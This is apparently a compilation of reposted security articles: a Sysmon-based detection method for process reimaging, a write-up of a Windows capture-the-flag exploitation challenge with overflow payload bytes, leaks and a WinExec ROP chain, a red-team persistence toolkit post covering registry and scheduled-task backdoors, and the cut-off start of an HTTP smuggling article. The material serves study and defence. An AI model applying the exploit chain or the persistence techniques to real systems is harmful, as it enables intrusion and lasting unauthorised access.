Transparency: When this attack was released I spent a Saturday creating a hunt hypothesis, going through the behavioral aspects of the data, and finding its relationships. When reviewing Dwight’s POC I noticed Win32 API calls in the code, and from those I was positive I could correlate those API calls to specific events. That confidence was misplaced, because like many defenders I had made assumptions regarding EDR products and their logging capabilities. Without a known API to Event ID mapping, I started to map these calls myself. I began (and continue to work on) the Sysmon side of the mapping. This involves reverse engineering the Sysmon driver to map API calls to Event Registration Mechanisms to Event IDs. Huge shoutout to Matt Graeber for helping me in this quest and taking the time to teach me the process of reverse engineering. Creating this mapping was a key part of the Detection Strategy that I implemented and would not have been possible without it. Process Reimaging Detection: Detection Methodology: The methodology that was used for this detection is as follows: Read the technical write-up of the Process Reimaging attack. Read through Dwight’s POC code. Gain knowledge on how the attack executes; create relationships between data and the behavior of the attack. Execute the attack. Apply the research knowledge with the data relationships to make a robust detection. Detection Walk Through When walking through the Technical Deep Dive portion of the blog, this stood out to me: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/ The picture above shows a couple of API calls that particularly piqued my interest: LoadLibrary CreateProcess Based on my research inside the Sysmon driver, both of these API calls are funneled through an event registration mechanism.
This mechanism is then called upon by the Sysmon driver using the requisite Input/Output Control (IOCTL) codes to query the data. The queried data is then pulled back into the Sysmon binary, which produces the correlating Event ID. For both of the API calls above, their correlating processes are shown below: Mapping of Sysmon Event ID 1: Process Creation Mapping of Sysmon Event ID 7: Image Loaded Based on this research and the technical deep dive section in the McAfee article, I know exactly what data will be generated when this attack is performed. Sysmon should have an Event ID 7 for each call to LoadLibrary, and an Event ID 1 for the call to CreateProcess; however, how do I turn data into actionable data, data that a threat hunter can easily use and manipulate to suit their needs? To do this, we focus on Data Standardization and Data Quality. Data Quality is derived from Data Standardization. Data Standardization is the process of transforming data into a common readable format that can then be easily analyzed. Data Quality is the process of making sure the environment is collecting the correct data, which can then be rationalized to specific attack techniques. This can be achieved by understanding the behavior of non-malicious data and creating behavioral correlations of the data provided during this attack. For example, when a process is created, the OriginalFileName (a relatively new addition to Sysmon) should match the Image section within Sysmon Event ID 1. When you launch PowerShell, the OriginalFileName will be Powershell.EXE and the Image will be C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. When these two don’t match, it is possibly an indicator of malicious activity. After process reimaging, when an application calls the GetMappedFileName API to retrieve the process image file, Windows will send back the incorrect file path.
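The OriginalFileName/Image comparison described above can be sketched as a small Python check; the event dicts are hypothetical stand-ins for parsed Sysmon Event ID 1 records:

```python
import ntpath  # handles Windows-style paths regardless of the host OS

def image_name_mismatch(event):
    """Flag a Sysmon Event ID 1 whose OriginalFileName (from the PE version
    resource) does not match the basename of the Image path."""
    image_stem = ntpath.basename(event["Image"]).rsplit(".", 1)[0].lower()
    orig_stem = event["OriginalFileName"].rsplit(".", 1)[0].lower()
    return image_stem != orig_stem

benign = {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "OriginalFileName": "PowerShell.EXE"}
reimaged = {"Image": r"C:\Users\victim\phase1.exe",
            "OriginalFileName": "svchost.exe"}
print(image_name_mismatch(benign), image_name_mismatch(reimaged))  # False True
```

Note that the stem comparison deliberately ignores the extension, since legitimate binaries sometimes carry a different one in the version resource (the ApplyTrustOffline.exe / ApplyTrustOffline.PROGRAM case mentioned later).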
A correlation can be made between the Image field in Event ID 1 and the ImageLoaded field in Event ID 7. Since Event ID 1 and 7 both have the OriginalFileName field, an analyst can execute a JOIN on the data for both events. In this JOIN, the results will show that the full path of the process being created (Image) and that of the image being loaded (ImageLoaded) should be equal. With this correlation, one can determine that these two events are from the same activity subset. The correlation above follows this portion of the attack: Function section we are basing the detection on: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/ Although a relationship can be made using Sysmon Event ID 1 and Sysmon Event ID 7, another relationship can be made based on the user-mode API NtCreateFile. This goes through the event registration mechanism FltRegisterFilter, which creates an Event ID 11 (File Creation) in Sysmon. This relationship can be correlated on Sysmon Event ID 1’s Image field, which should match Sysmon Event ID 11’s TargetFilename. Sysmon Event ID 1’s ParentProcessGuid should also match Sysmon Event ID 11’s ProcessGuid to ensure the events are both caused by the same process. Now that the research is done, the hypotheses have to be tested. Data Analytics: Below is the command used to execute the attack. The process (phase1.exe) was created by loading a binary (svchost.exe), then reimaged as lsass.exe. .\CSProcessReimagingPOC.exe C:\Windows\System32\svchost.exe C:\Windows\System32\lsass.exe The following SparkSQL code is the analytics version of what was discussed above: Query run utilizing Jupyter Notebooks and SparkSQL. Gist I tried to make the JOIN functions as readable as possible. One thing to note is that this query pulls from the raw data logs within Sysmon; no transformations are being performed within a SIEM pipeline.
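A minimal Python sketch of the Event ID 1 / Event ID 11 correlation just described, standing in for the SparkSQL JOIN; the event records and GUIDs are made up:

```python
def correlate_reimaging(eid1_events, eid11_events):
    """Join Sysmon process-creation (EID 1) and file-creation (EID 11) events:
    the created process's Image should match an EID 11 TargetFilename, and the
    creating process (EID 1 ParentProcessGuid) should be the process that
    wrote the file (EID 11 ProcessGuid)."""
    hits = []
    for proc in eid1_events:
        for file_ev in eid11_events:
            if (proc["Image"] == file_ev["TargetFilename"]
                    and proc["ParentProcessGuid"] == file_ev["ProcessGuid"]):
                hits.append((proc["ProcessGuid"], proc["Image"]))
    return hits

file_drop = {"ProcessGuid": "{guid-dropper}",
             "TargetFilename": r"C:\Temp\phase1.exe"}
proc_start = {"ProcessGuid": "{guid-phase1}",
              "ParentProcessGuid": "{guid-dropper}",
              "Image": r"C:\Temp\phase1.exe"}
print(correlate_reimaging([proc_start], [file_drop]))
```

In a real pipeline the nested loop would of course be a hash join keyed on (TargetFilename, ProcessGuid); the point here is only which fields pair up.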
Below is a visual representation of the joins and data correlations being done within Jupyter Notebooks utilizing SparkSQL. The query also checks whether a created file is subsequently moved to a different directory, as well as whether the OriginalFileName of a file doesn’t match the Image for Sysmon Event ID 1 (e.g., a created process with Image “ApplyTrustOffline.exe” and OriginalFileName “ApplyTrustOffline.PROGRAM”). After these checks, the query will only bring back the results of the reimaging attack. Graphed View of JOINs in Query The output of the SQL query above can be seen below. You may find that the query output appears to contain “duplicates” of the events. This isn’t the case: each time the attack is run, there will be a Sysmon Event ID 11 (FileCreate) that fires after each Sysmon Event ID 1 (Process Creation). This correlates with the behavior of the attack that was discussed above. Query Output The dataset and Jupyter Notebook that correlate with this analysis are available on my GitHub. I encourage anyone to pull them down to analyze the data for themselves. If you don’t have a lab to test it in, one can be found here: https://github.com/jsecurity101/mordor/tree/master/environment/shire/aws. Below is a breakdown of the stages and the information of the dataset that was run, which correlates with the query above. One thing to keep in mind is that when the malicious binary is reimaged to the binary of the adversary’s choosing (stage 3), you will not see that “phase1.exe” was reimaged to “lsass.exe”. This is the behavior of the attack; Windows will send back the improper file object. This doesn’t debunk this detection. The goal is to discover the behavior of the attack, and once that is done you can either follow the ProcessGuid of “phase1.exe” or go to its full path to find the Image of the binary it was reimaged with. “Phase1.exe” will appear under the context of that reimaged binary.
Image of the properties of phase1.exe after reimaging is executed Conclusion: Process Reimaging really piqued my interest, as it seemed to be focused on flying under the radar to avoid detection. Each technique an attacker leverages will have data that follows the behavior of the attack. This can be leveraged, but only once we understand our data and data sources. Moving away from signature-based hunts to more of a data-driven hunt methodology will help with the robustness of detections. Thank You: A huge thank you to Matt Graeber for helping me with the reverse engineering process of the Sysmon driver; to Dwight Hohnstein for his POC code; and lastly, to Brian Reitz for helping when SQL wasn’t behaving. References/Resources: In NTDLL I Trust — Process Reimaging and Endpoint Security Solution Bypass Dwight’s Process Reimaging POC Microsoft Docs Posts By SpecterOps Team Members Written by Jonathan Johnson Posts from SpecterOps team members on various topics relating to information security Sursa: https://posts.specterops.io/you-can-run-but-you-cant-hide-detecting-process-reimaging-behavior-e6bb9a10c40b
18. Writeup for the BFS Exploitation Challenge 2019 Table of Contents Introduction TL;DR Initial Dynamic Analysis Statically Identifying the Vulnerability Strategy Preparing the Exploit Building a ROP Chain See Exploit in Action Contact Introduction Having enjoyed and succeeded in solving a previous BFS Exploitation Challenge from 2017, I've decided to give the 2019 BFS Exploitation Challenge a try. It is a Windows 64-bit executable for which an exploit is expected to work on a Windows 10 Redstone machine. The challenge's goals were set to: Bypass ASLR remotely Achieve arbitrary code execution (pop calc or notepad) Have the exploited process properly continue its execution TL;DR Spare me all the boring details, I want to grab a copy of the challenge study the decompiled code study the exploit Initial Dynamic Analysis Running the file named 'eko2019.exe' opens a console application that seemingly waits for and accepts incoming connections from (remote) network clients. Quickly checking out the running process' security features using Sysinternals Process Explorer shows that DEP and ASLR are enabled, but Control Flow Guard is not. Good. Further checking out the running process dynamically using tools such as Sysinternals TCPView, Process Monitor or simply running netstat could have been an option right now, but personally I prefer diving directly into the code using my static analysis tool of choice, IDA Pro (I recommend following along with your favourite disassembler / decompiler). Statically Identifying the Vulnerability Having disassembled the executable file and looking at the list of identified functions, the maximum number of functions that needed to be analyzed for weaknesses was as little as 17 out of 188 in total - with the remaining ones being known library functions, imported functions and the main() function itself.
Navigating to and running the disassembled code's main() function through the Hex-Rays decompiler and putting some additional effort into renaming functions, variables and annotating the code resulted in the following output: By looking at the code and annotations shown in the screenshot above, we can see there is a call to a function in line 19 which creates a listening socket on TCP port 54321, shortly followed by a call to accept() in line 27. The socket handle returned by accept() is then passed as an argument to a function handle_client() in line 36. Keeping in mind the goals of this challenge, this is probably where the party is going to happen, so let's have a look at it. As an attacker, what we are going to look for and concentrate on are functions within the server's executable code that process any kind of input that is controlled client-side. All with the goal in mind of identifying faulty program logic that hopefully can be taken advantage of by us. In this case, it is the two calls to the recv() function in lines 21 and 30 in the screenshot above which are responsible for receiving data from a remote network client. The first call to recv() in line 21 receives a hard-coded number of 16 bytes into a "header" structure. It consists of three distinct fields, of which the first, at offset 0, is "magic"; the second, at offset 8, is "size_payload"; and the third is unused. By accessing the "magic" field in line 25 and comparing it to a constant value "Eko2019", the server ensures basic protocol compatibility between connected clients and the server. Any client packet that fails to comply with this magic constant as part of the "header" packet is denied further processing as a consequence. By comparing the "size_payload" field of the "header" structure to a constant value in line 27, the server limits the field's maximum allowed value to 512. This is to ensure that a subsequent call to recv() in line 30 receives a maximum number of 512 bytes in total.
Doing so prevents the destination buffer "buf" from being written to beyond its maximum size of 512 bytes - too bad! If this sanity check wasn't present, it would have allowed us to overwrite anything that follows the "buf" buffer, including the return address to main() on the stack. Overwriting the saved return address could have resulted in straightforward and reliable code execution. Skimming through this function's remaining code (and also through all the other remaining functions) doesn't reveal any more code that'd process client-side input in any obviously dangerous way, either. So we must probably have overlooked something and (yes, you guessed it) it's in the processing of the "pkthdr" structure. A useful pointer to what the problem could be is provided by the hint window that appears as soon as the mouse is hovered over the comparison operator in line 27. As it turns out, it is a signed integer comparison, which means the size restriction of 512 can successfully be bypassed by providing a negative number along with the header packet in "size_payload"! Looking further down the code at line 30, the "size_payload" variable is typecast to a 16-bit integer type as indicated by the decompiler's LOWORD() macro. Typecasting the 32-bit "size_payload" variable to a 16-bit integer effectively cuts off its upper 16 bits before it is passed as a size argument to recv(). This enables an attacker to cause the server to accept payload data with a size of up to 65535 bytes in total. Sending the server a suitably crafted packet effectively bypasses the intended size restriction of 512 bytes and successfully overwrites the "buf" variable on the stack beyond its intended limits.
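The header layout and the two flaws (signed comparison plus LOWORD() truncation) can be modeled in a few lines of Python; the field layout follows the decompilation above, and whether the boundary is 512 inclusive or exclusive does not matter for the bypass:

```python
import struct

MAGIC = b"Eko2019\x00"

def make_packet(size_payload, payload):
    # Header layout as recovered above: magic at offset 0, size at offset 8,
    # last 4 bytes unused ("<8sI4x" packs exactly 16 bytes).
    return struct.pack("<8sI4x", MAGIC, size_payload & 0xFFFFFFFF) + payload

def passes_size_check(size_payload):
    # The server's comparison is signed ('jle'), so a value with the top bit
    # set sails through as a negative number.
    signed = size_payload - (1 << 32) if size_payload & 0x80000000 else size_payload
    return signed <= 512

def bytes_actually_received(size_payload):
    # LOWORD() truncation: only the low 16 bits reach recv().
    return size_payload & 0xFFFF

evil = 0x80000500                        # signed: negative; LOWORD: 0x500
print(passes_size_check(evil))           # True
print(bytes_actually_received(evil))     # 1280
print(passes_size_check(0x300))          # False: an honest 768-byte request is refused
print(len(make_packet(evil, b"A" * 1280)))  # 1296
```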
If we wanted to verify the decompiler's results or if we refrained from using a decompiler entirely because we preferred sharpening or refreshing our assembly comprehension skills instead, we could just as well have a look at the assembler code: the "jle" instruction indicates a signed integer comparison the "movzx eax, word ptr..." instruction moves 16 bits of data from a data source to a 32 bit register eax, zero extending its upper 16 bits. Alright, before we can start exploiting this vulnerability and take control of the server process' instruction pointer, we need to find a way to bypass ASLR remotely. Also, by checking out the handle_client() function's prologue in the disassembly, we can see there is a stack cookie that will be checked by the function's epilogue which eventually needs to be taken care of . Strategy In order to bypass ASLR, we need to cause the server to leak an address that belongs to its process space. Fortunately, there is a call to the send() function in line 45, which sends 8 bytes of data, so exactly the size of a pointer in 64 bit land. That should serve our purpose just fine. These 8 bytes of data are stored into a _QWORD variable "gadget_buf" as the result of a call to the exec_gadget() function in line 44. Going further up the code to line 43, we can see self-modifying code that uses the WriteProcessMemory() API function to patch the exec_gadget() function with whatever data "gadget_buf" contains. The "gadget_buf" variable in turn is the result of a call to the copy_gadget() function in line 41 which is passed the address of a global variable "g_gadget_array" as an argument. Looking at the copy_gadget() function's decompiled code reveals that it takes an integer argument, swaps its endianness and then returns the result to the caller. In summary, whatever 8 bytes the "g_gadget_array" at position "gadget_idx % 256" points to will be executed by the call to exec_gadget() and its result is then sent back to the connected client. 
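A quick Python model of copy_gadget()'s transformation, assuming it simply reverses the byte order of a 64-bit value as the decompilation suggests:

```python
import struct

def copy_gadget(qword):
    """Byte-swap a 64-bit value, as the decompiled copy_gadget() does before
    the result is patched into exec_gadget() via WriteProcessMemory()."""
    return struct.unpack("<Q", struct.pack(">Q", qword))[0]

print(hex(copy_gadget(0x0102030405060708)))  # 0x807060504030201
```

The swap is an involution, so applying it twice returns the original value; the server stores the gadget bytes pre-swapped and undoes the swap at patch time.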
Looking at the cross references to "g_gadget_array" which is only initialized during run-time, we can find a for loop that initializes 256 elements of the array "g_gadget_array" as part of the server's main() function: Going back to the handle_client() function, we find that the "gadget_idx" variable is initialized with 62, which means that a gadget pointed to by "p_gadget_array[62]" is executed by default. The strategy is getting control of the "gadget_idx" variable. Luckily, it is a stack variable adjacent to the "buf[512]" variable and thus can be written to by sending the server data that exceeds the "buf" variable's maximum size of 512 bytes. Having "gadget_idx" under control allows us to have the server execute a gadget other than the default one at index 62 (0x3e). In order to be able to find a reasonable gadget in the first place, I wrote a little Python script that mimics the server's initialization of "g_gadget_array" and then disassembles all its 256 elements using the Capstone Engine Python bindings: I spent quite some time reading the resulting list of gadgets trying to find a suitable gadget to be used for leaking a qualified pointer from the running process, but with partial success only. Knowing I must have been missing something, I still settled with a gadget that would manage to leak the lower 32 bits of a 64 bit pointer only, for the sake of progressing and then fixing it the other day: Using this gadget would modify the pointer that is passed to the call to exec_gadget(), making it point to a location other than what the "p" pointer usually points to, which could then be used to leak further data. Based on working around some limitations by hard-coding stuff, I still managed to develop quite a stable exploit including full process continuation. But it was only after a kind soul asked me whether I hadn't thought of reading from the TEB that I got on the right track to writing an exploit that is more than just quite stable. 
Thank you Preparing the Exploit The TEB holds vital information that can be used for bypassing ASLR, and it is accessed via the gs segment register on 64-bit Windows systems. Looking through the list of gadgets for any occurrence of "gs:" yields a single hit at index 0x65 of the "g_gadget_array" pointer. Acquiring the current thread's TEB address is possible by reading from gs:[030h]. In order to have the gadget shown in the screenshot above do so, the rcx register must first be set to 0x30. The rcx register is the first argument to the exec_gadget() function, which is loaded from the "p" variable on the stack. Like the "gadget_idx" variable, "p" is adjacent to the overflowable buffer, hence overwritable as well. Great. By sending a particularly crafted sequence of network packets, we are now given the ability to leak arbitrary data of the server thread's TEB structure. For example, by sending the following packet to the server, gadget number 0x65 will be called with rcx set to 0x30. [0x200*'A'] + ['\x65\x00\x00\x00\x00\x00\x00\x00'] + ['\x30\x00\x00\x00\x00\x00\x00\x00'] Sending this packet will overwrite the target thread's following variables on the stack and will cause the server to send us the current thread's TEB address: [buf] + [gadget_idx] + [p] The following screenshot shows the Python implementation of the leak_teb() function used by the exploit. With the process' TEB address leaked to us, we are well prepared for leaking further information by using the default gadget 62 (0x3e), which dereferences arbitrary 64 bits of process memory pointed to by rcx per request: In turn, leaking arbitrary memory allows us to bypass DEP and ASLR, identify the stack cookie's position on the stack, leak the stack cookie, locate ourselves on the stack, and eventually run an external process. In order to bypass ASLR, the "ImageBaseAddress" of the target executable must be acquired from the Process Environment Block, which is accessible at gs:[060h].
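The payload construction just described can be sketched in Python; the filler size and qword layout follow the write-up, while the leaked TEB value below is a made-up placeholder (the TEB-at-gs:[0x60]-holds-the-PEB and PEB+0x10 ImageBaseAddress offsets are the documented x64 values):

```python
import struct

def overflow_packet(gadget_idx, p_value):
    """0x200 filler bytes fill 'buf'; the next two qwords land on the adjacent
    stack variables gadget_idx and p (p becomes rcx inside exec_gadget)."""
    return b"A" * 0x200 + struct.pack("<QQ", gadget_idx, p_value)

# Step 1: run gadget 0x65 (the 'gs:' read) with rcx = 0x30 -> leaks the TEB address.
teb_leak = overflow_packet(0x65, 0x30)
print(len(teb_leak))  # 528

# Step 2: with the TEB address in hand, the default dereference gadget 0x3e
# reads arbitrary qwords, e.g. the PEB pointer stored at TEB+0x60, and from
# there PEB+0x10 gives ImageBaseAddress.
teb = 0x000000AB12340000  # hypothetical leaked value
read_peb_ptr = overflow_packet(0x3E, teb + 0x60)
print(len(read_peb_ptr))  # 528
```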
This will allow for relative addressing of the individual ROP gadgets and is required for building a ROP chain that bypasses Data Execution Prevention. Based on the executable's in-memory "ImageBaseAddress", the address of the WinExec() API function, as well as the stack cookie's xor key, can be leaked. What's still missing is a way of acquiring the stack cookie from the current thread's stack frame. Although I knew that the approach was faulty, I had initially leaked the cookie by abusing the fact that there exists a reliable pointer to the formatted text that is created by any preceding call to the printf() function. By sending the server a packet that solely consisted of printable characters, with a size that would overflow the entire stack frame but stop right before the stack cookie's position, the call to printf() would leak the stack cookie from the stack into the buffer holding the formatted text, whose address had previously been acquired. While this might have been an interesting approach, it is error-prone: if the cookie contained any null bytes right in the middle, the call to printf() would make only a partial copy of the cookie, which would have caused the exploit to become unreliable. Instead, I've decided to leak both "StackBase" and "StackLimit" from the TIB, which is part of the TEB, and walk the entire stack, starting from StackLimit, looking for the first occurrence of the saved return address to main(). Relative to there, the cookie that belongs to the handle_client() function's stack frame can be addressed and subsequently leaked to our client. Having a copy of the cookie and a copy of the xor key at hand will allow the rsp register to be recovered, which can then be used to build the final ROP chain.
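The cookie/rsp recovery exploits MSVC's x64 /GS scheme, where the cookie stored in the frame is the per-module __security_cookie XORed with rsp, so recovery is a single XOR (the values below are made up):

```python
def recover_rsp(leaked_frame_cookie, leaked_xor_key):
    """MSVC x64 stores (security_cookie XOR rsp) in the frame, so with both
    the in-frame cookie and the module's key leaked, rsp falls out directly."""
    return leaked_frame_cookie ^ leaked_xor_key

rsp_at_prologue = 0x00007FF6A1B2C3D4          # hypothetical
xor_key = 0x1122334455667788                  # hypothetical leaked __security_cookie
frame_cookie = rsp_at_prologue ^ xor_key      # what the prologue would have stored
print(hex(recover_rsp(frame_cookie, xor_key)))  # 0x7ff6a1b2c3d4
```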
Using ROPgadget, a list of gadgets was created which was then used to craft the following chain:
1. The ROP chain starts at "entry_point", which is located at offset 0x230 of the vulnerable function's "buf" variable and which previously contained the original return address to main(). It loads "ptr_to_chain" at offset 0x228 into the rsp register, which effectively lets rsp point into the next gadget at 2.). Stack pivoting is a vital step in order to avoid trashing the caller's stack frame; messing up the caller's frame would risk stable process continuation.
2. This gadget loads the address of a "pop rax" gadget into r12, in preparation for a "workaround" that is required in order to compensate for the return address that is pushed onto the stack by the call r12 instruction in 4.).
3. A pointer to "buf" is loaded into rax, which now points to the "calc\0" string.
4. The pointer to "calc\0" is copied to rcx, which is the first argument for the subsequent API call to WinExec() in 5.). The call to r12 pushes a return address on the stack and causes the "pop rax" gadget to be executed, which will pop the address off of the stack again.
5. This gadget causes the WinExec() API function to be called.
6. The call to WinExec() happens to overwrite some of our ROP chain on the stack, hence the stack pointer is adjusted by this gadget to skip the data that is "corrupted" by the call to WinExec().
7. The original return address to main()+0x14a is loaded into rax.
8. rbx is loaded with the address of "entry_point".
9. The original return address to main()+0x14a is restored by patching "entry_point" on the stack -> "mov qword ptr [entry_point], main+0x14a". After that, rsp is adjusted, followed by a few dummy bytes.
10. rsp is adjusted so it will slowly slide into its old position at offset 0x230 of "buf", in order to return to main() and guarantee process continuation.
11. see 10.)
12. see 10.)
13. see 10.)
See Exploit in Action Contact Twitter Sursa: https://github.com/patois/BFS2019
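Mechanically, assembling such a chain is just packing qwords rebased on the leaked ImageBaseAddress; here is a hedged sketch with placeholder offsets (not the real gadget offsets from the challenge binary):

```python
import struct

def build_rop_chain(image_base, gadget_offsets):
    """Pack each gadget address as a little-endian qword, rebased on the
    ImageBaseAddress leaked earlier. Offsets here are hypothetical."""
    return b"".join(struct.pack("<Q", image_base + off) for off in gadget_offsets)

leaked_base = 0x7FF6A0000000                  # hypothetical leaked ImageBaseAddress
chain = build_rop_chain(leaked_base, [0x1234, 0x5678, 0x9ABC])
print(len(chain))  # 24
```

Because every entry is base-relative, the same chain works across reboots despite ASLR, which is the whole point of the leak stage.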
19. Threat Research SharPersist: Windows Persistence Toolkit in C# September 03, 2019 | by Brett Hawkins powershell persistence Toolkit Windows Background PowerShell has been used by the offensive community for several years now, but recent advances in the defensive security industry are causing offensive toolkits to migrate from PowerShell to reflective C# to evade modern security products. Some of these advancements include Script Block Logging, the Antimalware Scan Interface (AMSI), and the development of signatures for malicious PowerShell activity by third-party security vendors. Several public C# toolkits such as Seatbelt, SharpUp and SharpView have been released to assist with tasks in various phases of the attack lifecycle. One phase of the attack lifecycle that has been missing a C# toolkit is persistence. This post will talk about a new Windows Persistence Toolkit created by FireEye Mandiant’s Red Team called SharPersist. Windows Persistence During a Red Team engagement, a lot of time and effort is spent gaining initial access to an organization, so it is vital that the access is maintained in a reliable manner. Therefore, persistence is a key component of the attack lifecycle, shown in Figure 1. Figure 1: FireEye Attack Lifecycle Diagram Once an attacker establishes persistence on a system, the attacker will have continual access to the system after any power loss, reboots, or network interference. This allows an attacker to lay dormant on a network for extended periods of time, whether it be weeks, months, or even years. There are two key components of establishing persistence: the persistence implant and the persistence trigger, shown in Figure 2. The persistence implant is the malicious payload, such as an executable (EXE), HTML Application (HTA), dynamic link library (DLL), or some other form of code execution. The persistence trigger is what will cause the payload to execute, such as a scheduled task or Windows service.
There are several known persistence triggers that can be used on Windows, such as Windows services, scheduled tasks, registry, and startup folder, and more continue to be discovered. For a more thorough list, see the MITRE ATT&CK persistence page.

Figure 2: Persistence equation

SharPersist Overview

SharPersist was created in order to assist with establishing persistence on Windows operating systems using a multitude of different techniques. It is a command line tool written in C# which can be reflectively loaded with Cobalt Strike's "execute-assembly" functionality or any other framework that supports the reflective loading of .NET assemblies. SharPersist was designed to be modular to allow new persistence techniques to be added in the future. There are also several items related to tradecraft that have been built into the tool and its supported persistence techniques, such as file time stomping and running applications minimized or hidden. SharPersist and all associated usage documentation can be found at the SharPersist FireEye GitHub page.

SharPersist Persistence Techniques

There are several persistence techniques that are supported in SharPersist at the time of this blog post. A full list of these techniques and their required privileges is shown in Figure 3.

Technique               | Description                                              | Switch (-t)     | Admin required? | Touches registry? | Adds/modifies files on disk?
------------------------|----------------------------------------------------------|-----------------|-----------------|-------------------|-----------------------------
KeePass                 | Backdoor KeePass configuration file                      | keepass         | No              | No                | Yes
New Scheduled Task      | Creates new scheduled task                               | schtask         | No              | No                | Yes
New Windows Service     | Creates new Windows service                              | service         | Yes             | Yes               | No
Registry                | Registry key/value creation/modification                 | reg             | No              | Yes               | No
Scheduled Task Backdoor | Backdoors existing scheduled task with additional action | schtaskbackdoor | Yes             | No                | Yes
Startup Folder          | Creates LNK file in user startup folder                  | startupfolder   | No              | No                | Yes
Tortoise SVN            | Creates Tortoise SVN hook script                         | tortoisesvn     | No              | Yes               | No

Figure 3: Table of supported persistence techniques

SharPersist Examples

On the SharPersist GitHub, there is full documentation on usage and examples for each persistence technique. A few of the techniques will be highlighted below.

Registry Persistence

The first technique that will be highlighted is registry persistence. A full listing of the supported registry keys in SharPersist is shown in Figure 4.

Key code (-k) | Registry Key                                               | Registry Value         | Admin required? | Supports env add-on (-o env)?
--------------|------------------------------------------------------------|------------------------|-----------------|------------------------------
hklmrun       | HKLM\Software\Microsoft\Windows\CurrentVersion\Run         | User supplied          | Yes             | Yes
hklmrunonce   | HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce     | User supplied          | Yes             | Yes
hklmrunonceex | HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx   | User supplied          | Yes             | Yes
userinit      | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | Userinit               | Yes             | No
hkcurun       | HKCU\Software\Microsoft\Windows\CurrentVersion\Run         | User supplied          | No              | Yes
hkcurunonce   | HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce     | User supplied          | No              | Yes
logonscript   | HKCU\Environment                                           | UserInitMprLogonScript | No              | No
stickynotes   | HKCU\Software\Microsoft\Windows\CurrentVersion\Run         | RESTART_STICKY_NOTES   | No              | No

Figure 4: Supported registry keys table

In the following example, we will perform a validation of our arguments and then add registry persistence.
Performing a validation before adding the persistence is a best practice, as it makes sure that you have the correct arguments and passes other safety checks before actually adding the respective persistence technique. The example shown in Figure 5 creates a registry value named "Test" with the value "cmd.exe /c calc.exe" in the "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" registry key.

Figure 5: Adding registry persistence

Once the persistence is no longer needed, it can be removed using the "-m remove" argument, as shown in Figure 6. We remove the "Test" registry value that was created previously, and then list all registry values in "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" to validate that it was removed.

Figure 6: Removing registry persistence

Startup Folder Persistence

The second persistence technique that will be highlighted is the startup folder persistence technique. In this example, we are creating an LNK file called "Test.lnk" that will be placed in the current user's startup folder and will execute "cmd.exe /c calc.exe", as shown in Figure 7.

Figure 7: Performing dry-run and adding startup folder persistence

The startup folder persistence can then be removed, again using the "-m remove" argument, as shown in Figure 8. This will remove the LNK file from the current user's startup folder.

Figure 8: Removing startup folder persistence

Scheduled Task Backdoor Persistence

The last technique highlighted here is the scheduled task backdoor persistence. Scheduled tasks can be configured to execute multiple actions at a time, and this technique will backdoor an existing scheduled task by adding an additional action. The first thing we need to do is look for a scheduled task to backdoor. In this case, we will be looking for scheduled tasks that run at logon, as shown in Figure 9.
Figure 9: Listing scheduled tasks that run at logon

Once we have a scheduled task that we want to backdoor, we can perform a dry run to ensure the command will work, and then actually execute the command, as shown in Figure 10.

Figure 10: Performing dry run and adding scheduled task backdoor persistence

As you can see in Figure 11, the scheduled task is now backdoored with our malicious action.

Figure 11: Listing backdoored scheduled task

A backdoored scheduled task action used for persistence can be removed as shown in Figure 12.

Figure 12: Removing backdoored scheduled task action

Conclusion

Using reflective C# to assist in various phases of the attack lifecycle is a necessity in the offensive community, and persistence is no exception. Windows provides multiple techniques for persistence, and more will continue to be discovered and used by security professionals and adversaries alike. This tool is intended to aid security professionals in the persistence phase of the attack lifecycle. By releasing SharPersist, we at FireEye Mandiant hope to bring awareness to the various persistence techniques that are available in Windows and the ability to use these persistence techniques with C# rather than PowerShell.

Sursa: https://www.fireeye.com/blog/threat-research/2019/09/sharpersist-windows-persistence-toolkit.html
  20. Security: HTTP Smuggling, Apache Traffic Server

Sept 17, 2019. Security details of CVE-2018-8004 (August 2018 - Apache Traffic Server).

Contents:
- What is this about?
- Apache Traffic Server?
- Fixed versions of ATS
- CVE-2018-8004
- Step by step Proof of Concept
  - Set-up the lab: Docker instances
  - Test That Everything Works
  - Request Splitting by Double Content-Length
  - Request Splitting by NULL Character Injection
  - Request Splitting using Huge Header, Early End-Of-Query
  - Cache Poisoning using Incomplete Queries and Bad Separator Prefix (Attack schema)
  - HTTP Response Splitting: Content-Length Ignored on Cache Hit (Attack schema)
- Timeline
- See also

English version (Version Française disponible sur makina corpus). Estimated read time: 15 min, or quite a bit more.

What is this about?

This article will give a deep explanation of the HTTP Smuggling issues present in CVE-2018-8004. Firstly because there is currently not much information about it ("Undergoing Analysis" at the time of this writing on the previous link). Secondly, some time has passed since the official announcement (and even more since the availability of fixes in v7), and mostly because I keep receiving questions on what exactly HTTP Smuggling is and how to test/exploit this type of issue, and because Smuggling issues are now trending and easier to test thanks to the great work of James Kettle (@albinowax).

So, this time, I'll give you not only details but also a step by step demo with some Dockerfiles to build your own test lab. You can use that test lab to experiment with manual raw queries, or to test the recently added Burp Suite Smuggling tools. I'm really a big proponent of always searching for Smuggling issues in non-production environments, for legal reasons and also to avoid unintended consequences (and we'll see in this article, with the last issue, that unintended behaviors can always happen).

Apache Traffic Server?

Apache Traffic Server, or ATS, is an Open Source HTTP load balancer and Reverse Proxy Cache.
It is based on a commercial product donated to the Apache Foundation. It is not related to the Apache httpd HTTP server; the "Apache" name comes from the Apache Foundation, and the code is very different from httpd. If you were to search for ATS installations in the wild you would find some, hopefully fixed by now.

Fixed versions of ATS

